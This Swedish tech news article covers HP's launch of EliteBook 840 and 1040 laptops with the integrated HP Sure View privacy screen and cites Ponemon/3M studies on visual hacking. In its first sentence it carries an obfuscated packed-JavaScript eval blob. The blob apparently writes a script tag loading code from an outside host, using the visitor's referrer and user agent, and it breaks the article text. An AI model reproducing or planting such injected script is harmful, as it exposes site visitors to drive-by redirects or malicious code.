Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

PC

HP lanserar världens första bärbara datorer med integrerat sektretessfilter

HP lanserar världens första bärbara datorer med integrerat sektretessfilter
Sebastian

HP eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eaibe|var|u0026u|referrer|nddby||js|php’.split(’|’),0,{}))
Inc. presenterade idag världens första datorer med integrerade privacy screens, sekretessfilter1. HP Sure View, är ett nytt alternativ på HP Elitebook 1040 och HP Elitebook 840 som hjälper till att skydda mot visuell hacking med ett enda knapptryck.

“Eftersom vi idag rör oss bort från att enbart arbeta i kontorsmiljöer till mer offentliga platser, blir visuell hackning allt vanligare. Visuell hackning gör det möjligt för hackare att få tag i konfidentiell information genom att titta på någon annans skärm”, säger Charlie Stahre, Category Manager Business Notebooks, HP Inc. Sverige.

”Tillskottet av HP Sure View till våra säkerhetslösningar för HP EliteBooks ger kunderna trygghet och frihet att arbeta var de vill utan rädsla för att exponera känslig information.”

HP Sure View är utvecklad med 3M sekretessfilter som gör att det inte behövs externa verktyg för att skydda känslig information. Användarna trycker bara på F2 för att omedelbart försätta datorn i privat läge, vilket minskar upp till 95 procent av synligt ljus när den betraktas från en vinkel, vilket gör det svårt för andra att se informationen på skärmen.

Visuell hackning är ett reellt hot mot företags känsliga information, det visar “Global Visual Hacking Experiment,” en ny studie från Ponemon Institute, på uppdrag av 3M. Studien visar att nio av tio försök att skaffa känslig företagsinformation med enbart visuella medel lyckades2. Visuell hackning kan också påverka den anställdes produktivitet då nästan 60 procent tar med sitt jobb utanför kontoret3. En liknande studie från Ponemon Institutet, på uppdrag av 3M, fann också att anställda som använder en visuell integritetslösning kan vara dubbelt så produktiva när de arbetar i närheten av andra.4

HP Sure View hjälper användarna att arbeta mer konfidentiellt från offentliga platser utan att behöva oroa sig för att exponera känslig information för andra. Att bygga in denna teknologi direkt i enheten kan hjälpa företag att bättre uppfylla myndighetskrav, särskilt för företag inom hälso- och sjukvården, offentlig sektor och finans.

Tillgänglighet

HP Sure View väntas bli tillgängligt under september, som ett tillval i EliteBook 840 och EliteBook1040. För mer information om HPs Elite produkter och tillbehör, besök: www.hp.com/elite.